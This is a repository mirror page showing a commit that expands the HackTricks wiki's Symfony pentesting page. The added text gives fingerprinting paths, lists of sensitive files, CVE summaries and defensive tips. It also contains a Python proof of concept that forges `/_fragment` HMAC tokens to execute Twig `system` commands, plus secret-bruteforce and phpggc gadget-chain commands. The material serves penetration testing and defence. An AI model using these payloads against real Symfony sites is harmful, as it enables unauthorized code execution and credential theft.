maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add content from: Research Update: Enhanced src/network-services-pentesting/pe...

Browse Source
This commit is contained in:
HackTricks News Bot 2025-07-22 08:31:01 +00:00
parent fa138775ab
commit cc1b81c4d2
1 changed files with 121 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

128
src/network-services-pentesting/pentesting-web/symphony.md
View File

@ -2,13 +2,127 @@
{{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}}
Take a look to the following posts: Symfony is one of the most widely-used PHP frameworks and regularly appears in assessments of enterprise, e-commerce and CMS targets (Drupal, Shopware, Ibexa, OroCRM … all embed Symfony components). This page collects offensive tips, common mis-configurations and recent vulnerabilities you should have on your checklist when you discover a Symfony application.
- [**https://www.ambionics.io/blog/symfony-secret-fragment**](https://www.ambionics.io/blog/symfony-secret-fragment) > Historical note: A large part of the ecosystem still runs the **5.4 LTS** branch (EOL **November 2025**). Always verify the exact minor version because many 2023-2025 security advisories only fixed in patch releases (e.g. 5.4.46 → 5.4.50).
- [**hhttps://blog.flatt.tech/entry/2020/11/02/124807**](https://blog.flatt.tech/entry/2020/11/02/124807)
- [**https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144**](https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144)
---
## Recon & Enumeration
### Finger-printing
* HTTP response headers: `X-Powered-By: Symfony`, `X-Debug-Token`, `X-Debug-Token-Link` or cookies starting with `sf_redirect`, `sf_session`, `MOCKSESSID`.
* Source code leaks (`composer.json`, `composer.lock`, `/vendor/…`) often reveal the exact version:
```bash
curl -s https://target/vendor/composer/installed.json | jq '.[] | select(.name|test("symfony/")) | .name,.version'
```
* Public routes that only exist on Symfony:
* `/_profiler` (Symfony **Profiler** & debug toolbar)
* `/_wdt/<token>` (“Web Debug Toolbar”)
* `/_error/{code}.{_format}` (pretty error pages)
* `/app_dev.php`, `/config.php`, `/config_dev.php` (pre-4.0 dev front-controllers)
* Wappalyzer, BuiltWith or ffuf/feroxbuster wordlists: `symfony.txt` → look for `/_fragment`, `/_profiler`, `.env`, `.htaccess`.
### Interesting files & endpoints
| Path | Why it matters |
|------|----------------|
| `/.env`, `/.env.local`, `/.env.prod` | Frequently mis-deployed → leaks `APP_SECRET`, DB creds, SMTP, AWS keys |
| `/.git`, `.svn`, `.hg` | Source disclosure → credentials + business logic |
| `/var/log/*.log`, `/log/dev.log` | Web-root mis-configuration exposes stack-traces |
| `/_profiler` | Full request history, configuration, service container, **APP_SECRET** (≤ 3.4) |
| `/_fragment` | Entry point used by ESI/HInclude. Abuse possible once you know `APP_SECRET` |
| `/vendor/phpunit/phpunit/phpunit` | PHPUnit RCE if accessible (CVE-2017-9841) |
| `/index.php/_error/{code}` | Finger-print & sometimes leak exception traces |
---
## High-impact Vulnerabilities (2023-2025)
### 1. APP_SECRET disclosure ➜ RCE via `/_fragment` (aka “secret-fragment”)
* **CVE-2019-18889** originally, but *still* appears on modern targets when debug is left enabled or `.env` is exposed.
* Once you know the 32-char `APP_SECRET`, craft an HMAC token and abuse the internal `render()` controller to execute arbitrary Twig:
```python
# PoC requires the secret
import hmac, hashlib, requests, urllib.parse as u
secret = bytes.fromhex('deadbeef…')
payload = "{{['id']|filter('system')}}" # RCE in Twig
query = {
'template': '@app/404.html.twig',
'filter': 'raw',
'_format': 'html',
'_locale': 'en',
'globals[cmd]': 'id'
}
qs = u.urlencode(query, doseq=True)
token = hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest()
r = requests.get(f"https://target/_fragment?{qs}&_token={token}")
print(r.text)
```
* Excellent write-up & exploitation script: Ambionics blog (linked in References).
### 2. Windows Process Hijack CVE-2024-51736
* The `Process` component searched the current working directory **before** `PATH` on Windows. An attacker able to upload `tar.exe`, `cmd.exe`, etc. in a writable web-root and trigger `Process` (e.g. file extraction, PDF generation) gains command execution.
* Patched in 5.4.50, 6.4.14, 7.1.7.
### 3. Session-Fixation CVE-2023-46733
* Authentication guard reused an existing session ID after login. If an attacker sets the cookie **before** the victim authenticates, they hijack the account post-login.
### 4. Twig sandbox XSS CVE-2023-46734
* In applications that expose user-controlled templates (admin CMS, email builder) the `nl2br` filter could be abused to bypass the sandbox and inject JS.
### 5. Symfony 1 gadget chains (still found in legacy apps)
* `phpggc symfony/1 system id` produces a Phar payload that triggers RCE when an unserialize() happens on classes such as `sfNamespacedParameterHolder`. Check file-upload endpoints and `phar://` wrappers.
{{#ref}}
../../pentesting-web/deserialization/php-deserialization-+-autoload-classes.md
{{#endref}}
---
## Exploitation Cheat-Sheet
### Calculate HMAC token for `/_fragment`
```bash
python - <<'PY'
import sys, hmac, hashlib, urllib.parse as u
secret = bytes.fromhex(sys.argv[1])
qs = u.quote_plus(sys.argv[2], safe='=&')
print(hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest())
PY deadbeef… "template=@App/evil&filter=raw&_format=html"
```
### Bruteforce weak `APP_SECRET`
```bash
cewl -d3 https://target -w words.txt
symfony-secret-bruteforce.py -w words.txt -c abcdef1234567890 https://target
```
### RCE via exposed Symfony Console
If `bin/console` is reachable through `php-fpm` or direct CLI upload:
```bash
php bin/console about # confirm it works
php bin/console cache:clear --no-warmup
```
Use deserialization gadgets inside the cache directory or write a malicious Twig template that will be executed on the next request.
---
## Defensive notes
1. **Never deploy debug** (`APP_ENV=dev`, `APP_DEBUG=1`) to production; block `/app_dev.php`, `/_profiler`, `/_wdt` in the web-server config.
2. Store secrets in env vars or `vault/secrets.local.php`, *never* in files accessible through the document-root.
3. Enforce patch management subscribe to Symfony security advisories and keep at least the LTS patch-level.
4. If you run on Windows, upgrade immediately to mitigate CVE-2024-51736 or add a `open_basedir`/`disable_functions` defence-in-depth.
---
### Useful offensive tooling
* **ambionics/symfony-exploits** secret-fragment RCE, debugger routes discovery.
* **phpggc** Ready-made gadget chains for Symfony 1 & 2.
* **sf-encoder** small helper to compute `_fragment` HMAC (Go implementation).
## References
* [Ambionics Symfony “secret-fragment” Remote Code Execution](https://www.ambionics.io/blog/symfony-secret-fragment)
* [Symfony Security Advisory CVE-2024-51736: Command Execution Hijack on Windows Process Component](https://symfony.com/blog/cve-2024-51736-command-execution-hijack-on-windows-with-process-class)
{{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}}